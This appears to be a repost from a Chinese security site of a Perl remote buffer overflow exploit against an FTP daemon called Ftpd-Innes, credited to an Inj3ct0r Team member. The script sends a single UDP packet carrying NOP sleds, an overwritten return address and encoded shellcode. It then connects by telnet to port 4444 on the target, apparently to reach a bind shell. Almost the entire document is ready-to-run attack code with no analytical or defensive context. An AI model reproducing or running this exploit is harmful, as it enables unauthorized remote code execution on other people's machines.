Ftpd-Innes Remote Buffer Overflow Exploit

		当前位置：主页>安全文章>文章资料>Exploits>文章内容
Ftpd-Innes Remote Buffer Overflow Exploit
来源：Angel-Injection@hotmail.com 作者：Angel 发布时间：2011-10-25
#!/usr/bin/perl -w
                          ||          ||   | ||      
                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_,
                  ( :   /    (_)    /           (   .
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm Angel Injection member from Inj3ct0r Team          1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
use IO::Socket;
 
if(!($ARGV[1]))
{
 print "Usage: ./Ftpd-innes.pl target host port\n\n";
 exit;
}
 
$victim = IO::Socket::INET->new(Proto=>'udp',
                                PeerAddr=>$ARGV[0],
                                PeerPort=>$ARGV[1])
                            or die "Cannot connect to $ARGV[0] sulla porta $ARGV[1]";
 
my $nop0="\x90"x20;
 
my $asm="\x7c\xc5\x66\x07\x12\x02\x50\xc3";
 
my $nop1="\x90"x60;
 
my $nop2="\x90"x10;

my $eip="\x42\xfd\x60\x40";
#my $eip="A"x5;

my $shellcode =
"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xed".
"\x7d\x09\xbf\x83\xeb\xfc\xe2\xf4\x11\x17\xe2\xf2\x05\x84\xf6\x40".
"\x12\x1d\x82\xd3\xc9\x59\x82\xfa\xd1\xf6\x75\xba\x95\x7c\xe6\x34".
"\xa2\x65\x82\xe0\xcd\x7c\xe2\xf6\x66\x49\x82\xbe\x03\x4c\xc9\x26".
"\x41\xf9\xc9\xcb\xea\xbc\xc3\xb2\xec\xbf\xe2\x4b\xd6\x29\x2d\x97".
"\x98\x98\x82\xe0\xc9\x7c\xe2\xd9\x66\x71\x42\x34\xb2\x61\x08\x54".
"\xee\x51\x82\x36\x81\x59\x15\xde\x2e\x4c\xd2\xdb\x66\x3e\x39\x34".
"\xad\x71\x82\xcf\xf1\xd0\x82\xff\xe5\x23\x61\x31\xa3\x73\xe5\xef".
"\x12\xab\x6f\xec\x8b\x15\x3a\x8d\x85\x0a\x7a\x8d\xb2\x29\xf6\x6f".
"\x85\xb6\xe4\x43\xd6\x2d\xf6\x69\xb2\xf4\xec\xd9\x6c\x90\x01\xbd".
"\xb8\x17\x0b\x40\x3d\x15\xd0\xb6\x18\xd0\x5e\x40\x3b\x2e\x5a\xec".
"\xbe\x2e\x4a\xec\xae\x2e\xf6\x6f\x8b\x15\x18\xe3\x8b\x2e\x80\x5e".
"\x78\x15\xad\xa5\x9d\xba\x5e\x40\x3b\x17\x19\xee\xb8\x82\xd9\xd7".
"\x49\xd0\x27\x56\xba\x82\xdf\xec\xb8\x82\xd9\xd7\x08\x34\x8f\xf6".
"\xba\x82\xdf\xef\xb9\x29\x5c\x40\x3d\xee\x61\x58\x94\xbb\x70\xe8".
"\x12\xab\x5c\x40\x3d\x1b\x63\xdb\x8b\x15\x6a\xd2\x64\x98\x63\xef".
"\xb4\x54\xc5\x36\x0a\x17\x4d\x36\x0f\x4c\xc9\x4c\x47\x83\x4b\x92".
"\x13\x3f\x25\x2c\x60\x07\x31\x14\x46\xd6\x61\xcd\x13\xce\x1f\x40".
"\x98\x39\xf6\x69\xb6\x2a\x5b\xee\xbc\x2c\x63\xbe\xbc\x2c\x5c\xee".
"\x12\xad\x61\x12\x34\x78\xc7\xec\x12\xab\x63\x40\x12\x4a\xf6\x6f".
"\x66\x2a\xf5\x3c\x29\x19\xf6\x69\xbf\x82\xd9\xd7\x1d\xf7\x0d\xe0".
"\xbe\x82\xdf\x40\x3d\x7d\x09\xbf";
 
$exploit = "\x00\x01" . $nop0 .$asm.$nop1. $shellcode. $nop2 .$eip. "\x00\x7e\x56\x70\x60\x70\x45\x69\x69\x00";
 
print $victim $exploit;
 
print " + Malicious request sent ...\n";
 
sleep(2);
 
print "Done.\n";
 
close($victim);
$host = $ARGV[0];
print " + connect to 4444 port of $host ...\n";
sleep(3);
system("telnet $host 4444");
exit;
[